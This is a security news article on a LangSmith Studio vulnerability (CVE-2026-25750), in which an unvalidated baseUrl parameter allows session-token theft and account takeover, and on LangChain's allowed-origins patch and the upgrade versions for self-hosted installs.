Critical LangSmith Vulnerability Exposes Users to Account Takeover
Basically, a flaw in LangSmith can let hackers steal user accounts without any user action.
A critical vulnerability in LangSmith could allow hackers to take over user accounts. This flaw affects users who rely on LangSmith for AI data monitoring. Immediate action is required to ensure security and protect sensitive information.
The Flaw
Security researchers from Miggo have uncovered a critical vulnerability in LangSmith, identified as CVE-2026-25750. This flaw poses a significant risk to users, allowing potential token theft and complete account takeover. LangSmith serves as a central hub for debugging? and monitoring large language model data, processing billions of events daily. This makes the vulnerability particularly dangerous for enterprise AI environments.
The vulnerability originates from an insecure API? configuration feature within LangSmith Studio. It uses a flexible baseUrl parameter, which allows developers to fetch data from various backend API?s. Previously, the application trusted this input without validating the destination domain, creating a serious security gap. If a user clicks a malicious link or visits a compromised site, their browser could route API? requests and session credentials to an attacker-controlled server.
What's at Risk
Exploiting this vulnerability does not require traditional phishing methods. Instead, the attack occurs silently in the background, using the victim’s active session. When a victim visits a malicious webpage?, a script forces their browser to load a crafted LangSmith Studio URL pointing to an attacker-controlled server. This results in the victim’s browser sending session credentials to the malicious domain instead of the legitimate server.
Once the attacker intercepts the session token?, they have a five-minute window to hijack the account before the token expires. The implications of an account takeover? in an AI observability platform are severe. Attackers can access detailed AI trace histories, which often include sensitive debugging? data, proprietary source code?, and even financial records. They can also manipulate project settings or delete critical observability workflows?, jeopardizing the integrity of the entire system.
Patch Status
In response to this vulnerability, LangChain has implemented a strict allowed origins policy. This update mandates that domains must be explicitly configured as trusted origins in account settings before they can be accepted as an API? base URL. Any unauthorized requests are now automatically blocked. According to the LangSmith Security Advisory released on January 7, 2026, there is currently no evidence of active exploitation in the wild.
For cloud customers, the vulnerability was resolved by December 15, 2025, requiring no action. However, self-hosted administrators must upgrade their systems to LangSmith version 0.12.71 or Helm chart langsmith-0.12.33 and later to ensure protection.
Immediate Actions
Users of LangSmith should take this vulnerability seriously. If you are a self-hosted administrator, ensure that your environment is updated to the latest version immediately. For cloud users, verify that your systems are functioning correctly and monitor for any unusual activity. Staying informed about security updates and best practices is essential in maintaining a secure environment, especially when dealing with sensitive AI data.
By addressing this vulnerability swiftly, organizations can safeguard their assets and maintain trust in their AI systems.
Cyber Security News